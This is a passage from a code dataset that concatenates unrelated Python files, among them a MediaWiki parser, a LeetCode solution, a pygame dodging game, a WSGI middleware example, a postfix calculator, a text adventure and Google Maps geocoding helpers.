obj[\"content\"][-1][\"params\"][\"1\"]\n\n return merge(obj, {\"content\": heading, \"anchor\": anchor})\n\n class HandleTemplates(NodeTypeTransformation, SectionTracking):\n def transform_template(self, obj):\n for bname, tname, param_names in BOXSPEC:\n if obj[\"name\"] == tname:\n params = {k: self(obj[\"params\"].get(v, None))\n for k, v in param_names.items()}\n\n return merge(params, {\"type\": bname})\n\n if obj[\"name\"] == \"liste\":\n if \"liste\" in obj[\"params\"]:\n sublist = obj[\"params\"][\"liste\"][0]\n\n assert sublist[\"type\"] == \"list\"\n\n items = sublist[\"items\"]\n ordered = sublist[\"ordered\"]\n else:\n items = [{\"type\": \"listitem\", \"content\": self(x)}\n for x in obj[\"params\"][\"item_list\"]]\n ordered = obj[\"params\"].get(\"type\", \"\") == \"ol\"\n\n return {\"type\": \"list\", \"items\": items, \"ordered\": ordered,\n \"spacing\": obj[\"params\"].get(\"abstand\", None)}\n elif obj[\"name\"] == \"formel\":\n formula = obj[\"params\"].get(\"1\", [])\n\n if len(formula) == 1 and \\\n lookup(formula, 0, \"type\") == \"inlinemath\":\n formula = formula[0][\"formula\"]\n if formula.startswith(\"\\\\begin{align}\") and formula.endswith(\"\\\\end{align}\"):\n formula = remove_prefix(formula, \"\\\\begin{align}\")\n formula = remove_suffix(formula, \"\\\\end{align}\")\n formula = \"\\\\begin{align}\" + formula + \"\\\\end{align}\"\n return {\"type\": \"equation\", \"formula\": formula}\n else:\n message = \"Wrong formatted equation\"\n details = \"Equation source code must be completely contained in just one .\\n (use \\\\text{this is not math} macro instead)\"\n\n log_parser_error(message, obj, details, self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n elif obj[\"name\"] == \"(!\":\n return None\n elif obj[\"name\"].startswith(\"#invoke:\"):\n # Template is header or footer\n return None\n elif obj[\"name\"] == \"noprint\":\n return None\n elif obj[\"name\"] == \"todo\":\n message = \"Todo-Message in MediaWiki code.\"\n details = \"Check if this TODO shoud be completed for a book release.\"\n log_parser_error(message, obj, details, self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n else:\n message = \"Parsing of template `{}`\".format(obj[\"name\"])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"notimplemented\",\n \"target\": obj,\n \"message\": message}\n\n class NormalizeFormulas(NodeTypeTransformation):\n def normalize(self, obj, mode):\n try:\n formula = self.api.normalize_formula(obj[\"formula\"], mode)\n\n if mode == \"tex\":\n formula = remove_prefix(formula, \"{\\\\begin{aligned}\")\n formula = remove_suffix(formula, \"\\\\end{aligned}}\")\n except ValueError:\n message = \"Wrong formatted formula\"\n # TODO: current_section was not set for this class\n log_parser_error(message, obj)\n return {\"type\": \"error\",\n \"message\": message}\n\n return merge(obj, {\"formula\": formula})\n\n def transform_inlinemath(self, obj):\n return self.normalize(obj, \"inline-tex\")\n\n def transform_equation(self, obj):\n return self.normalize(obj, \"tex\")\n\n class DeleteEmptyNodes(Transformation):\n pass\n\n class AddDefaultValues(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\").of(DEFAULT_VALUES)\n\n return merge(DEFAULT_VALUES[obj[\"type\"]],\n super(NodeTransformation, self).act_on_dict(obj))\n\ndef parse_article_inline(api, title, text):\n # TODO: there might be a better solution by merging with parse_inline()\n result = ArticleContentParser(api=api, title=title)(text)\n\n assert len(result) == 1\n assert result[0][\"type\"] == \"paragraph\"\n\n return result[0][\"content\"]\n\nclass ArticleParser(ChainedAction):\n class LoadArticleContent(NodeTypeTransformation):\n \"\"\"Loads the content of an article.\"\"\"\n\n def get_article_authors(self, title):\n revisions = self.api.get_revisions(title)\n\n authors = defaultdict(int)\n article_size = 0\n\n for rev in (x for x in reversed(revisions) if \"anon\" not in x):\n user = resolve_usernames(rev[\"user\"])\n authors[user] += max(rev[\"size\"] - article_size, 50)\n article_size = rev[\"size\"]\n\n return authors\n\n def transform_article(self, article):\n parser = ArticleContentParser(api=self.api, title=article[\"title\"])\n\n article_link = self.api._index_url + \"?title=\" + article[\"title\"].replace(\" \", \"+\")\n report_logger.info(\"== Parsing of Article [{} {}] ==\".format(article_link, article[\"title\"]))\n\n content = parser(self.api.get_content(article[\"title\"]))\n authors = self.get_article_authors(article[\"title\"])\n\n return merge(article, {\"content\": content, \"authors\": authors})\n\n class MergeAuthorCounts(NodeTypeTransformation):\n def transform_chapter(self, obj):\n authors = defaultdict(int)\n\n for k, v in chain(*(x[\"authors\"].items() for x in obj[\"children\"])):\n authors[k] += v\n\n return merge(obj, {\"authors\": authors})\n\n class MergeIncludedSections(NodeTypeTransformation):\n \"\"\"Removes the `included_section` intermediate node.\"\"\"\n\n def transform_included_section(self, obj):\n return {\"type\": \"error\",\n \"message\": \"Included section not merged.\"}\n\n def transform_article(self, obj):\n if not next(filter(lambda x: x[\"type\"] == \"included_section\",\n obj[\"content\"]),\n None):\n return obj\n merged_content = chain(*(x[\"content\"]\n if x[\"type\"] == \"included_section\"\n else [x]\n for x in obj[\"content\"]))\n return merge(obj, {\"content\": list(merged_content)})\n\n class BuildStructureTree(NodeTypeTransformation, SectionTracking):\n \"\"\"Transforms a flat article into a tree based on its structure.\"\"\"\n\n def split_list(self, prd, lst):\n subforest = [[]]\n for elem in lst:\n if prd(elem):\n subforest.append([])\n else:\n subforest[-1].append(elem)\n return subforest if len(subforest[0]) > 0 else subforest[1:]\n\n def unfold_section(self, obj, level):\n test = lambda x: x[\"type\"] == \"header\" and x[\"depth\"] == level\n headings = list(filter(test, obj[\"content\"]))\n contents = self.split_list(test, obj[\"content\"])\n # case 1: no underlying structure\n if not headings and len(contents) == 1:\n subsections = obj[\"content\"]\n # case 2: no paragraph before first header\n elif len(headings) == len(contents):\n subsections = [{\"type\": \"section\",\n \"title\": h[\"content\"],\n \"depth\": h[\"depth\"],\n \"content\": c}\n for h, c in zip(headings, contents)]\n # case 3: one paragraph before first header\n elif len(headings) == len(contents) - 1:\n subsections = (contents[0] +\n [{\"type\": \"section\",\n \"title\": h[\"content\"],\n \"depth\": h[\"depth\"],\n \"content\": c}\n for h, c in zip(headings, contents[1:])])\n # mismatch between headers and paragraphs\n else:\n message = \"ill-formed structure in article\"\n subsections = [{\"type\": \"error\",\n \"message\": message}]\n log_parser_error(message, obj, position=self.current_position)\n return merge(obj, {\"content\": self(subsections)})\n\n def transform_article(self, obj):\n return self.unfold_section(obj, 1)\n\n def transform_section(self, obj):\n return self.unfold_section(obj, obj[\"depth\"] + 1)\n\n class RemoveExcludedSections(NodeTypeTransformation):\n def __init__(self, **options):\n super().__init__(**options)\n self.excludes = []\n\n def transform_article(self, obj):\n # TODO: parse_inline(x) should be called before\n self.excludes = [parse_article_inline(self.api, obj[\"title\"], x)\n for x in obj[\"excludes\"]]\n\n raise NotInterested()\n\n def transform_section(self, obj):\n if obj[\"title\"] in self.excludes:\n return\n else:\n raise NotInterested()\n","sub_path":"mfnf/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":33710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20397900","text":"# https://leetcode.com/problems/longest-common-prefix/\n\n\"\"\"\n暴力解法: 先求第一个和第二个元素的最长prefix, 之后的元素的common prefix 肯定要比这个preix短。\n第三个元素和前两个元素的最长prefix作比较,然后进行替换(old_prefix == long_prefix)\n直到比较完最后一个元素。这样得出的就是整个数组的最长prefix\n\nbinary search: TBD\n\"\"\"\nclass Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n target = strs[0] # 第一个元素当作target\n for source in strs[1:]:\n if len(target) == 0 or len(source) == 0 or target[0] != source[0]:\n # 空字符串或者第一个字符就不相等时,不存在prefix,直接返回空\n return \"\"\n i = j = 0\n # 第一个字符已经相等,从第二个开始比较\n while i < len(target) and j < len(source):\n if target[i] != source[j]:\n break\n i += 1\n j += 1\n # 得到longest prefix并进行替换\n target = target[: i]\n return target\n ","sub_path":"most_interviewed/string/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412475025","text":"# coding=utf-8\n# Date: 15/4/3'\n# Email: wangjian2254@icloud.com\nimport json\nfrom django.conf import settings\n\n__author__ = u'王健'\n\n#生成 banner 的url列表文件\n# 增加bae测试banner\n# by:尚宗凯 at:2015-4-6\n\nf = file('../static/client_banner/banner.json', 'w')\nl = []\nfor i in range(5):\n l.append('http://baetest.tjeasyshare.com/static/client_banner/home_banner%s.jpg' % i)\nf.write(json.dumps(l))\nf.close()","sub_path":"dev_files/banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"644977972","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport feedparser\n\nfrom model import Event_tagger\nfrom constants import MODEL_PATH\n\n\ndef to_ix(word, word_to_ix):\n return word_to_ix[word] if word in word_to_ix else word_to_ix[\n '`'] # ` - being pad word\n\n\ndef prepare_data():\n NewsFeed = feedparser.parse(\"https://news.yandex.ru/politics.rss\")\n data = []\n links = []\n for entry in NewsFeed.entries:\n data.append(entry['summary'].replace('"',\n '').replace('»', '').replace('«', ''))\n links.append(entry['link'])\n return data, links\n\n\ndef tokenize_data(data, word_to_ix):\n data_splitted = []\n data_ix = []\n for text in data:\n data_splitted.append([a.split() for a in text.split(\".\")][:-1])\n last = data_splitted[-1]\n text_ix = []\n for sent in last:\n text_ix.append(torch.tensor([to_ix(word, word_to_ix) for word in sent], dtype=torch.long))\n data_ix.append(text_ix)\n return data_splitted, data_ix\n\n\ndef entity_extraction(data_ix, model):\n all_tags = []\n for word_indices in data_ix:\n predicted_tags = []\n for i in range(len(word_indices)):\n tag_scores = model(torch.stack([word_indices[i]]))\n out_probs = torch.squeeze(tag_scores)\n tmp = []\n for j, pset in enumerate(out_probs):\n if j >= len(word_indices[i]):\n break\n _, predicted_ix = torch.max(pset, 0)\n tmp.append(predicted_ix.item())\n predicted_tags.append(tmp)\n all_tags.append(predicted_tags)\n return all_tags\n\n\ndef transform_result(tags, data_splitted, ix_to_tag):\n ans_dict = []\n for text in range(len(tags)):\n ans_text = []\n for sent in range(len(tags[text])):\n ans_sent = []\n for word in range(len(tags[text][sent])): \n ans_sent.append((ix_to_tag[tags[text][sent][word]],\n data_splitted[text][sent][word]))\n ans_text.append(ans_sent)\n ans_dict.append(ans_text)\n return ans_dict\n\n\ndef crawl_news():\n model = torch.load(MODEL_PATH)\n\n word_to_ix = model.word_to_ix\n ix_to_tag = model.ix_to_tag\n\n # clean data - [doc, doc]\n data, links = prepare_data()\n data_splitted, data_ix = tokenize_data(data, word_to_ix)\n \n # extract entities\n tags = entity_extraction(data_ix, model)\n ans_dict = transform_result(tags, data_splitted, ix_to_tag)\n return ans_dict, data_splitted, links\n","sub_path":"demo/crawl_news.py","file_name":"crawl_news.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321436416","text":"from django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\n\n\ndef validate_phone(value):\n if type(value) != str or not value.startswith('998') or len(value) != 12:\n raise ValidationError(\n _('%(value)s не является корректным номером телефона'),\n params={'value': value},\n )\n","sub_path":"apps/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"372150399","text":"from __future__ import print_function, division, absolute_import\n\nimport argparse\nimport random \nimport json\nfrom collections import OrderedDict\n\nimport cv2\nimport numpy as np\nimport torch as th\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom models.learner import SRL4robotics\nfrom preprocessing.utils import deNormalize\nfrom preprocessing.data_loader import preprocessImage\nfrom utils import detachToNumpy\n\nVALID_MODELS = [\"forward\", \"inverse\", \"reward\", \"priors\", \"episode-prior\", \"reward-prior\", \"triplet\",\n \"autoencoder\", \"vae\", \"dae\", \"random\"]\nAUTOENCODERS = ['autoencoder', 'vae', 'dae']\n\n\ndef getState(srl_model, obs, device):\n \"\"\"\n Gets an image by using the decoder of a SRL model\n (when available)\n\n :param srl_model: (Pytorch model)\n :param state: ([float]) the state vector from latent space\n :param device: (pytorch device)\n :return: ([float])\n \"\"\"\n obs = preprocessImage(obs)\n obs = th.tensor(obs.reshape((1,) + obs.shape).transpose(0, 3, 2, 1))\n with th.no_grad():\n obs = obs.to(device)\n net_out = srl_model.getStates(obs)\n state = detachToNumpy(net_out)[0].T\n\n return state\n\ndef getImage(srl_model, state, device):\n \"\"\"\n Gets an image by using the decoder of a SRL model\n (when available)\n\n :param srl_model: (Pytorch model)\n :param state: ([float]) the state vector from latent space\n :param device: (pytorch device)\n :return: ([float])\n \"\"\"\n with th.no_grad():\n state = th.from_numpy(np.array(state).reshape(1, -1)).float()\n state = state.to(device)\n\n net_out = srl_model.decode(state)\n img = detachToNumpy(net_out)[0].T\n\n img = deNormalize(img, mode=\"image_net\")\n return img[:, :, ::-1]\n\ndef getNextState(srl_model, state, action, device):\n with th.no_grad():\n state = th.from_numpy(np.array(state).reshape(1, -1)).float()\n action = th.from_numpy(np.array(action).reshape(1, -1)).long()\n\n state = state.to(device)\n action = action.to(device)\n\n net_out = srl_model.forwardModel(state, action)\n state = detachToNumpy(net_out)[0]\n # print (\"Next State : \" + str(state))\n\n return state\n\ndef main():\n parser = argparse.ArgumentParser(description=\"latent space enjoy\")\n parser.add_argument('--log-dir', default='', type=str, help='directory to load model')\n parser.add_argument('--no-cuda', default=False, action=\"store_true\")\n\n args = parser.parse_args()\n use_cuda = not args.no_cuda\n device = th.device(\"cuda\" if th.cuda.is_available() and use_cuda else \"cpu\")\n\n srl_model, exp_config = SRL4robotics.loadSavedModel(args.log_dir, VALID_MODELS, cuda=use_cuda)\n\n losses = exp_config['losses']\n state_dim = exp_config['state-dim']\n\n split_dimensions = exp_config.get('split-dimensions')\n loss_dims = OrderedDict()\n n_dimensions = 0\n if split_dimensions is not None and isinstance(split_dimensions, OrderedDict):\n for loss_name, loss_dim in split_dimensions.items():\n print(loss_name, loss_dim)\n if loss_dim > 0 or len(split_dimensions) == 1:\n loss_dims[loss_name] = loss_dim\n\n if len(loss_dims) == 0:\n print(losses)\n loss_dims = {losses[0]: state_dim}\n\n # Load all the states and images\n data = json.load(open(args.log_dir + 'image_to_state.json'))\n X = np.array(list(data.values())).astype(float)\n y = list(data.keys())\n\n should_exit = False\n\n cv2.namedWindow(\"Dream\", cv2.WINDOW_NORMAL)\n cv2.resizeWindow(\"Dream\", 500, 500)\n\n num_steps = 1000\n\n initial_img = cv2.imread(\"data/\"+y[random.randint(0, len(y))]+\".jpg\")\n inital_state = getState(srl_model.model, initial_img, device)\n state = inital_state\n # print (\"First state : \" + str(state))\n\n obs = initial_img\n for step in range(num_steps):\n cv2.imshow(\"Dream\", obs)\n k = cv2.waitKey(150) & 0xFF\n if k == 27:\n break\n\n action = random.randint(0, 5)\n # print (\"Selected action : \" + str(action))\n next_state_pred = getNextState(srl_model.model, state, action,\n device)\n obs = getImage(srl_model.model.model, next_state_pred, device)\n\n state = next_state_pred\n\n # Next state comes from the encoding of the current observation\n # state = getState(srl_model.model, img, device) \n\n # gracefully close\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","sub_path":"evaluation/dream.py","file_name":"dream.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"547681115","text":"import pygame\nimport gameMouseD\nfrom dodger_data import *\n\nclass Dodger(gameMouseD.Game):\n \n def __init__(self, width, height, frame_rate):\n\n gameMouseD.Game.__init__(self, \"Dodger\",\n width,\n height,\n frame_rate)\n\n\n pygame.mouse.set_visible(False)\n self.data = DodgerData(self.width, self.height, self.frames_per_second)\n self.background_color = (0, 0, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 48)\n self.player_image = pygame.image.load('X-Wing Up.png')\n self.baddie_image = pygame.image.load('asteroid.png')\n\n\n def game_logic(self, keys, newkeys, buttons, newbuttons, mouse_position):\n x = mouse_position[0]\n y = mouse_position[1]\n\n if not self.data.getEvolving():\n if len(newkeys) > 0:\n self.data.newGame()\n self.data.setEvolving(True)\n # self.game_over_sound.stop()\n # pygame.mixer.music.play(-1, 0.0)\n pygame.mouse.set_pos(self.data.getPlayerLocationX(), self.data.getPlayerLocationY())\n \n else:\n if pygame.K_RIGHT in keys:\n self.data.right()\n if pygame.K_LEFT in keys:\n self.data.left()\n if pygame.K_UP in keys:\n self.data.up()\n if pygame.K_DOWN in keys:\n self.data.down()\n\n \n self.data.evolve()\n\n if self.data.getGameOver():\n pygame.mixer.music.stop()\n self.game_over_sound.play()\n\n return\n \n def drawTextLeft(self, text, surface, x, y):\n textobj = self.font.render(text, 1, self.text_color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n return\n \n def drawTextCenter(self, text, surface, x, y):\n textobj = self.font.render(text, 1, self.text_color)\n textrect = textobj.get_rect()\n textrect.center = (x, y)\n surface.blit(textobj, textrect)\n return\n \n def paint(self, surface):\n rect = pygame.Rect(0, 0, self.width, self.height)\n surface.fill(self.background_color, rect)\n\n self.drawTextLeft('Score: %s' % (self.data.getScore()), surface, 10, 0)\n self.drawTextLeft('Top Score: %s' % (self.data.getTopScore()), surface, 10, 40)\n\n img = pygame.transform.scale(self.player_image, (self.data.getPlayerSize(), self.data.getPlayerSize()))\n surface.blit(img, (self.data.getPlayerLocationX(), self.data.getPlayerLocationY()))\n \n for b in self.data.baddies:\n img = pygame.transform.scale(self.baddie_image, (b[2], b[3]))\n surface.blit(img, (b[0], b[1]))\n \n if not self.data.getEvolving() and not self.data.getGameOver():\n self.drawTextCenter('Dodger', surface,\n self.width/2, self.height/3)\n self.drawTextCenter('Press a key to start', surface,\n self.width/2, self.height/2)\n elif not self.data.getEvolving() and self.data.getGameOver():\n self.drawTextCenter('GAME OVER', surface,\n self.width/2, self.height/3)\n self.drawTextCenter('Press a key to play again', surface,\n self.width/2, self.height/2)\n \n else:\n pass\n return\n \ndef mainD():\n pygame.font.init()\n pygame.mixer.init()\n d = Dodger(600, 600, 40)\n d.main_loop()\n \nif __name__ == \"__main__\":\n mainD()\n\n","sub_path":"dodger.py","file_name":"dodger.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563008863","text":"import unittest\nimport os\nfrom GPyUnit.util import DispatchEx, com_error\n\nclass TestParser(unittest.TestCase):\n def test_ParseMetaGME(self):\n testdir = os.path.dirname(os.path.abspath(__file__))\n inputfile = os.environ['GME_ROOT'] + r\"\\Paradigms\\MetaGME\\MetaGME-model.xme\"\n xme = DispatchEx(\"Mga.MgaParser\")\n (paradigm, parversion, parguid, basename, ver) = xme.GetXMLInfo(inputfile)\n mga = DispatchEx(\"Mga.MgaProject\")\n\n mga.Create(\"MGA=tmp.mga\", paradigm)\n terr = mga.BeginTransactionInNewTerr()\n # GME-371: this would crash\n self.assertRaises(com_error, xme.ParseProject, mga, inputfile)\n return\n mga.CommitTransaction()\n terr.Destroy()\n mga.Save()\n mga.Close()\n del(terr)\n del(mga)\n del(xme)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Tests/GPyUnit/GME_371.py","file_name":"GME_371.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"360451344","text":"# !usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under a 3-clause BSD license.\n#\n# @Author: Brian Cherinka\n# @Date: 2018-06-20 14:45:48\n# @Last modified by: Brian Cherinka\n# @Last Modified time: 2018-07-05 10:36:39\n\nfrom __future__ import print_function, division, absolute_import\n\n\nclass Telescope(object):\n ''' A Telescope configuration '''\n\n def __init__(self, name, **kwargs):\n self.name = name\n\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n def __repr__(self):\n return ''.format(self.name)\n\n\n\ndef initialize(config, params=None):\n ''' Initialize a telescope from a set configuration parameters '''\n\n survey = config.instrument.name\n size = params.get('telescope', '') if params else ''\n name = '{0} {1}'.format(survey, size)\n\n # copy the from telescope constants over from the Instrument object\n area_params = config.get_constants(config.instrument)\n\n telescope = Telescope(name, **area_params)\n return telescope\n\n\n","sub_path":"specsim/telescope.py","file_name":"telescope.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486402675","text":"\"\"\"\nwebob_wsgi.py\n\"\"\"\nfrom webob import Request, Response\nfrom wsgiref.simple_server import make_server\n\n\ndef wsgi_hello_app(environ, start_response):\n response = Response(\"Hello World\")\n\n #did you know that Response is a wsgi application\n return response(environ, start_response)\n\n# or this one-liner, because Response is a wsgi application\nwsgi_hello_app = Response(\"Hello World\")\n\n\ndef wsgi_hello_middleware(app):\n def m(environ, start_response):\n request = Request(environ)\n\n # request is a lot easier to manipulate than a dictionary\n # let's add a header to prove a point\n request.headers[\"WSGI-Hello-Middleware\"] = \"Say Hello Application\"\n\n # call a wsgi app and convert what it returns into a\n # webob.Response which is easier to manipulate\n response = request.get_response(app)\n\n response.headers[\"WSGI-Application-Middleware\"] = \"Say Hello Caller\"\n return response(environ, start_response)\n return m\n\n\napplication = wsgi_hello_middleware(wsgi_hello_app)\nserver = make_server(\"localhost\", 8080, application)\nserver.handle_request()\n","sub_path":"doc/source/webob_wsgi.py","file_name":"webob_wsgi.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"133969860","text":"import sys\nsys.stdin = open(\"input계산기3.txt\")\n\n# 연산자의 종류: +,*,(,)\n# 피연산자는 출력(후위표기법에 더하기)\n# +,*가 나오면 곱하기가 우선순위가 높음\n# 여는 괄호를 만나면 stack에 넣고,\n# 닫는 괄호를 만나면 그 때 stack에서 빼면 됨\n\n# 중위표현식을 후위표현식으로 바꾸기\n# 후위표현식 계산하기, 계산결과를 반환\ndef solve(exp):\n stack = list() # 후위표기식을 만들기 위한 스택\n # 1. 후위표기식으로 바꾸기\n postfix = '' # 후위표기식을 저장할 변수\n # 1. 표현식을 하나씩 읽음\n for i in range(L):\n # 2. 피연산자(숫자)가 나오면, 후위표기식에 더하기(문자열 1~9를 아스키코드로 비교하기 때문에 가능함)\n if \"0\" <= exp[i] <= \"9\":\n postfix += exp[i]\n # 3. 연산자가 나오면 우선순위에 의거해서 stack에 넣거나\n elif exp[i] == \"(\":\n stack.append(exp[i])\n elif exp[i] == \")\":\n # 여는 괄호가 나올때 까지 빼면서, 후위 표기식에 추가\n while stack[-1] != \"(\":\n postfix += stack.pop()\n stack.pop() # 여는 괄호는 버림\n else: # exp[i] 가 +, * 인 경우\n if not stack:\n stack.append(exp[i])\n continue\n # 곱하기 이면서 stack[-1]이 곱하기가 아니면 push\n # 더하기 이면서, stack[-1]이 괄호이면, push\n # 나머지는 * +가 아닐때 까지 pop하고 push\n if exp[i] == \"*\":\n stack.append(exp[i])\n elif exp[i] == '+' and stack[-1] == \"(\": # 얘보다 우선순위 낮은거는 '('에 없으니까...\n stack.append(exp[i])\n else:\n # stack에서 빼기\n while (stack and (stack[-1] == \"*\" or stack[-1] == \"+\")):\n postfix += stack.pop()\n stack.append(exp[i])\n while stack:\n postfix += stack.pop()\n cstack = list()\n # 2.후위표기식 계산하기\n # 피연산가 나오면 stack 넣고\n # 연산자가 나오면 stack에서 피연산자 2개 꺼내서 계산\n for i in range(len(postfix)):\n if postfix[i] == \"*\":\n v1 = cstack.pop()\n v2 = cstack.pop()\n cstack.append(v1 * v2)\n elif postfix[i] == \"+\":\n v1 = cstack.pop()\n v2 = cstack.pop()\n cstack.append(v1 + v2)\n else:\n cstack.append(int(postfix[i]))\n return cstack.pop()\n\n\nfor tc in range(1, 11):\n L = int(input())\n exp = input()\n result = solve(exp)\n print(\"#{} {}\".format(tc,result))","sub_path":"SWEA/문제/210302_과제_계산기3.py","file_name":"210302_과제_계산기3.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"457004435","text":"\"\"\"Comp1510 Assignment3 sud.py\n\nThis module allows user to play game\nGet user's info and play game based on the info\n\"\"\"\n\n\n# Yongju Kwon\n# A01059332\n# 09 MAR 2019\n\nfrom A3 import combat, map, moving, character, support_function, monster\n\n\ndef play(user: dict) -> None:\n \"\"\"Get a dictionary(user's info) and play game.\n\n Until user input 'quit', keep playing game\n check if user's input is valid, if so move inside boundary\n if user encounters monster, ask whether fight or run away\n if user tries to run away, monster hits user as much as 1d4 by 10 percent chance\n if user fight, invoke combat() to death\n if user doesn't encounter monster and user's hp is below 10, up 1hp each move\n if user input invalid input for direction, print helpful message\n PARAM: user, a dictionary\n PRECONDITION: user, must be a dictionary has valid keys and values\n POSTCONDITION: Print helpful message when user input invalid string\n \"\"\"\n user_input = \"\"\n map.show_map(user)\n while user_input != \"quit\":\n user_input = input(\"Which way do you want to go? (E/W/N/S) \").strip().lower()\n if moving.can_move(user_input, user['row'], user['column']):\n moving.move(user_input, user)\n if monster.encounter_monster():\n combat.fight_or_run_away(user)\n if combat.is_dead(user):\n user['Hp'], user_input = 10, \"quit\" # Hp full up for the next game, and quit the game.\n else:\n support_function.up_1_hp(user)\n elif user_input == \"quit\":\n support_function.save_user_info(user)\n else:\n print(\"Enter the direction again please.\")\n\n\ndef main():\n character.log_in()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"A3/sud.py","file_name":"sud.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"243367266","text":"import googlemaps\r\nfrom datetime import datetime\r\n\r\nfrom googlemaps import convert\r\nfrom uuid import uuid4 as places_autocomplete_session_token\r\nimport geocoder\r\nimport csv\r\n\r\nfrom math import radians, cos, sin, asin, sqrt\r\nimport os\r\n\r\n\r\ndef haversine(lon1, lat1, lon2, lat2):\r\n \"\"\"\r\n Calculate the great circle distance between two points \r\n on the earth (specified in decimal degrees)\r\n \"\"\"\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\r\n return c * r\r\n\r\n\r\n\r\n\r\nPLACES_FIND_FIELDS_BASIC = set([\r\n \"formatted_address\", \"geometry\", \"icon\", \"id\", \"name\",\r\n \"permanently_closed\", \"photos\", \"place_id\", \"plus_code\", \"scope\",\r\n \"types\",\r\n])\r\n\r\nPLACES_FIND_FIELDS_CONTACT = set([\"opening_hours\",])\r\n\r\nPLACES_FIND_FIELDS_ATMOSPHERE = set([\"price_level\", \"rating\"])\r\n\r\nPLACES_FIND_FIELDS = (PLACES_FIND_FIELDS_BASIC ^\r\n PLACES_FIND_FIELDS_CONTACT ^\r\n PLACES_FIND_FIELDS_ATMOSPHERE)\r\n\r\nPLACES_DETAIL_FIELDS_BASIC = set([\r\n \"address_component\", \"adr_address\", \"alt_id\", \"formatted_address\",\r\n \"geometry\", \"icon\", \"id\", \"name\", \"permanently_closed\", \"photo\",\r\n \"place_id\", \"plus_code\", \"scope\", \"type\", \"url\", \"utc_offset\", \"vicinity\",\r\n])\r\n\r\nPLACES_DETAIL_FIELDS_CONTACT = set([\r\n \"formatted_phone_number\", \"international_phone_number\", \"opening_hours\",\r\n \"website\",\r\n])\r\n\r\nPLACES_DETAIL_FIELDS_ATMOSPHERE = set([\"price_level\", \"rating\", \"review\",])\r\n\r\nPLACES_DETAIL_FIELDS = (PLACES_DETAIL_FIELDS_BASIC ^\r\n PLACES_DETAIL_FIELDS_CONTACT ^\r\n PLACES_DETAIL_FIELDS_ATMOSPHERE)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef geocode(client, address=None, components=None, bounds=None, region=None,\r\n language=None):\r\n \"\"\"\r\n Geocoding is the process of converting addresses\r\n (like ``\"1600 Amphitheatre Parkway, Mountain View, CA\"``) into geographic\r\n coordinates (like latitude 37.423021 and longitude -122.083739), which you\r\n can use to place markers or position the map.\r\n :param address: The address to geocode.\r\n :type address: string\r\n :param components: A component filter for which you wish to obtain a\r\n geocode, for example: ``{'administrative_area': 'TX','country': 'US'}``\r\n :type components: dict\r\n :param bounds: The bounding box of the viewport within which to bias geocode\r\n results more prominently.\r\n :type bounds: string or dict with northeast and southwest keys.\r\n :param region: The region code, specified as a ccTLD (\"top-level domain\")\r\n two-character value.\r\n :type region: string\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :rtype: list of geocoding results.\r\n \"\"\"\r\n\r\n params = {}\r\n\r\n if address:\r\n params[\"address\"] = address\r\n\r\n if components:\r\n params[\"components\"] = convert.components(components)\r\n\r\n if bounds:\r\n params[\"bounds\"] = convert.bounds(bounds)\r\n\r\n if region:\r\n params[\"region\"] = region\r\n\r\n if language:\r\n params[\"language\"] = language\r\n\r\n return client._request(\"/maps/api/geocode/json\", params).get(\"results\", [])\r\n\r\n\r\ndef reverse_geocode(client, latlng, 